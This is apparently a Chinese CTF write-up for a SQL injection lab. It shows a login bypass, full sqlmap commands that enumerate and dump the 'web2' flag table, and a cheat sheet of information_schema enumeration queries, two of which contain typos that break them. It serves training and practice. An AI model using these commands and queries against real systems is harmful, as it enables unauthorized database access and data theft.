打开靶机,根据提示是SQL注入
打开后看到登录窗口
方法一、手工注入
抓取数据包
开始SQL注入测试
利用万能密码,登录成功
查看回显位置
查询数据库
查询数据库内数据表
如果想整齐一点显示可以添加group_concat()
查询字段
查询字段内容
成功拿到flag
方法二、sqlmap注入
把之前抓取的数据复制到sqlmap根目录下test.txt内
保存完成后开始跑数据库名
python2 sqlmap.py -r test.txt --dbs
跑数据库内数据表
python2 sqlmap.py -r test.txt -D web2 --tables
查看字段
python2 sqlmap.py -r test.txt -D web2 -T flag --columns
查询字段内容
python2 sqlmap.py -r test.txt -D web2 -T flag -C flag --dump
成功拿到flag
sql手工注入常用语句:
普通语句:schema_name——数据库名;table_name——表名;column_name——字段名;
查询数据库:select schema_name from information_schema.schemata#
slelect database()#
查询数据库表:select table_name from information_schema.tables where table_schema='数据库名'#
查询字段名:select column_name from infromation_schema.columns where table_name='表名'#
查询字段内容:select * from 表名#